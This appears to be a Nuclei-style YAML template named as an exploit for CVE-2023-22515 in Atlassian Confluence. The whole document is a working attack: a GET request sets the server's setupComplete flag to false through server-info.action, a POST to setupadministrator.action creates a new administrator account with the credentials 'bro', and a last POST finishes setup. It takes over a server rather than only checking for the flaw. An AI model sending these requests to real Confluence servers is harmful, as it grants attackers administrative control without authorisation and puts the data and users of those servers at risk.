id: CVE-2023-22515

info:
  name: Atlassian Confluence Privelege Escalation Exploit
  author: 0xj3seer
  severity: critical


requests:
  - method: GET
    path:
      - "{{BaseURL}}/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    headers:
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200

  - method: POST
    path:
      - "{{BaseURL}}/setup/setupadministrator.action"
    body: 'username=bro&fullName=bro&email=bro@bro.com&password=bro&confirm=bro&setup-next-button=Next'
    headers:
      Content-Type: application/x-www-form-urlencoded
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200

  - method: POST
    path:
      - "{{BaseURL}}/setup/finishsetup.action"
    body: ''
    headers:
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200